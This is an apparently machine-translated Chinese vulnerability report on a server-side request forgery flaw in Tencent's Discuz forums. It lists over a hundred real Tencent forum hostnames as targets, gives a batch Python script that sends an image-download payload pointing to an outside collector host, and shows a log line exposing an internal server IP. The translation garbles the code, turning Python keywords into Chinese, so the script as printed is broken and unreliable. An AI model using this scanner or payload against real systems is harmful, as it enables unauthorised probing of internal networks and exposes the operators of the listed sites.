漏洞标题 腾讯某论坛存在SSRF漏洞(附批量捡漏脚本) 相关厂商 腾讯 漏洞作者 猪猪侠 提交时间 2016-06-12 11:25 公开时间 2016-06-13 17:23 漏洞类型 未授权访问/…
漏洞标题
腾讯论坛中有一个SSRF漏洞(有批量泄漏脚本)
相关制造商
腾讯
漏洞作者
猪人
提交时间
2016-06-12 11: 25
公共时间
2016-06-13 17: 23
漏洞类型
未经授权的访问/许可绕过
危险等级
在
自我评估等级
10
漏洞状态
该漏洞已通知供应商,但供应商忽略了该漏洞
标签标签
漏洞详细信息
#1首先找出腾讯从搜索引擎和抓取工具中使用Discuz程序的服务器列表。
http://fight.gamebbs.qq.com
http://qqhx.gamebbs.qq.com
http://bbs.digi.qq.com
http://bbs.write.qq.com
http://ff.gamebbs.qq.com
http://bbs.baby.qq.com
http://myhn.qq.com
http://bbs.e.qq.com
http://tpai.qq.com
http://bbs.fanli.qq.com
http://bbs.house.qq.com
http://xia.gamebbs.qq.com
http://bbs.cb.qq.com
http://bbs.ac.qq.com
http://club.auto.qq.com
http://bbs.open.qq.com
http://shouyou.qq.com
http://bbs.im.qq.com
http://qqbattle.gamebbs.qq.com
http://nz.gamebbs.qq.com
http://xx.gamebbs.qq.com
http://xb.gamebbs.qq.com
http://bbs.m.qq.com
http://forum.discuz.qq.com
http://bbs.cd.qq.com
http://myln.qq.com
http://ktv.gamebbs.qq.com
http://gf.gamebbs.qq.com
http://bbs.xian.qq.com
http://gamebbs.qq.com
http://ppjz.gamebbs.qq.com
http://dm.gamebbs.qq.com
http://ffo.gamebbs.qq.com
http://sg.gamebbs.qq.com
http://xb.qq.com
http://bbs.zt.qq.com
http://mygd.qq.com
http://xj.gamebbs.qq.com
http://xb.qq.com: 8080
http://bbs.gj.qq.com
http://bbs.vip.qq.com
http://bbs.sports.qq.com
http://bbs.weiqi.qq.com
http://lol.gamebbs.qq.com
http://bbs.finance.qq.com
http://d2.gamebbs.qq.com
http://fs.gamebbs.qq.com
http://myfj.qq.com
http://mysh.qq.com
http://ch.gamebbs.qq.com
http://qqxy.gamebbs.qq.com
http://codol.gamebbs.qq.com
http://ava.gamebbs.qq.com
http://fo.gamebbs.qq.com
http://bbs.lol.qq.com
http://wang.gamebbs.qq.com
http://bbs.games.qq.com
http://bbs.omd.qq.com
http://tps.gamebbs.qq.com
http://tiantang2.gamebbs.qq.com
http://qqgame.gamebbs.qq.com
http://bbs.yun.qq.com
http://yl.gamebbs.qq.com
http://bbs.wifi.qq.com
http://bns.gamebbs.qq.com
http://nba2k.gamebbs.qq.com
http://bbs.blog.qq.com
http://r2.gamebbs.qq.com
http://bbs.open.t.qq.com
http://ld2.gamebbs.qq.com
http://yu.gamebbs.qq.com
http://qgamepailei.gamebbs.qq.com
http://hao.wsq.qq.com
http://c9.gamebbs.qq.com
从对等方接收数据时失败
http://xxz.gamebbs.qq.com
http://bbs.pcmgr.qq.com
http://myxian.qq.com
http://xiaoyuan.qq.com
http://mycd.qq.com
http://cf.gamebbs.qq.com
http://ug.qq.com
http://myzj.qq.com
http://bbs.meishi.qq.com
http://bbs.astro.qq.com
http://7.gamebbs.qq.com
http://3366.gamebbs.qq.com
http://meng.gamebbs.qq.com
http://baoshi.gamebbs.qq.com
http://bbs.guanjia.qq.com
http://mo.gamebbs.qq.com
http://bbs.cf.qq.com
http://bbs.gd.qq.com
http://bbs.comic.qq.com
http://vr.qq.com
http://mycq.qq.com
http://tiantang.gamebbs.qq.com
http://bbs.map.qq.com
http://cheng.gamebbs.qq.com
http://tnt.gamebbs.qq.com
http://myhenan.qq.com
http://xy.gamebbs.qq.com
http://h2.gamebbs.qq.com
http://bbs.show.qq.com
http://bbs.wan.qq.com
http://bbs.ent.qq.com
http://qqsh.gamebbs.qq.com
http://mama.kid.qq.com
http://bbs.cq.qq.com
http://bbs.qt.qq.com
http://age.gamebbs.qq.com
http://bbs.fashion.qq.com
http://bbs.v.qq.com
http://bbs.mail.qq.com
http://bbs.ms.qq.com
http://pet.gamebbs.qq.com
http://bl.gamebbs.qq.com
http://bbs.hb.qq.com
http://x.gamebbs.qq.com
http://bbs.tgp.qq.com
http://hon.gamebbs.qq.com
http://jh.gamebbs.qq.com
http://zg.gamebbs.qq.com
https://xb.qq.com
http://9.gamebbs.qq.com
http://bbs.shang.qq.com
http://ye.gamebbs.qq.com
http://bbs.news.qq.com
http://bbs.qa.qq.com
http://bbs.chuangshi.qq.com
http://x5.gamebbs.qq.com
#2创建批量检测脚本泄漏
#!/usr/bin/env python
#coding: utf-8
导入urlparse
随机导入
进口时间
导入重新
导入请求
从utils.fileutils导入FileUtils
导入requests.packages.urllib3
Requests.packages.urllib3.disable_warnings()
对于FileUtils.getLines('qqdz.lst'):中的网站
Request=requests.session()
试试:
Forumurl='{website} /forum.php'.format(website=website)
Response=request.get(forumurl,timeout=5,verify=False)
Formhash=re.findall(r'formhash'value='(。*?)'',response.content)
Netloc=urlparse.urlparse(网站).netloc
Payload='http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc)
Url='{website} /forum.php?mod=ajax&action=downremoteimg&formhash={formhash}& message=[img] {payload} [/img]'。format(
网站=网站,
Formhash=formhash [0]如果formhash else'',
有效载荷=有效载荷)
Response=request.get(url,timeout=5,verify=False)
打印网址,len(response.content)
除了例外,e:
打印网站,e
上面的fileutils库就在这里
http://fuzz.wuyun.org/src/fileutils.py
漏洞证明:
#3运行批处理,检查fuzz.wuyun.com的httpd上的请求日志
119.29.69.176 - - [12/Jun/2016: 11: 00: 45 +0800]'GET /404.php?s=vr.qq.com.jpg HTTP/1.1'404 282' - '' - '
#4捡到一个泄露的论坛
http://vr.qq.com/forum.php
IP: 119.29.69.176
广东省广州腾讯云计算(北京)有限公司腾讯集团
修理计划:
#论坛这么多,总有一些失踪案例
版权声明:转载请注明出处猪猪人@乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 537 )
- 分类:黑客技术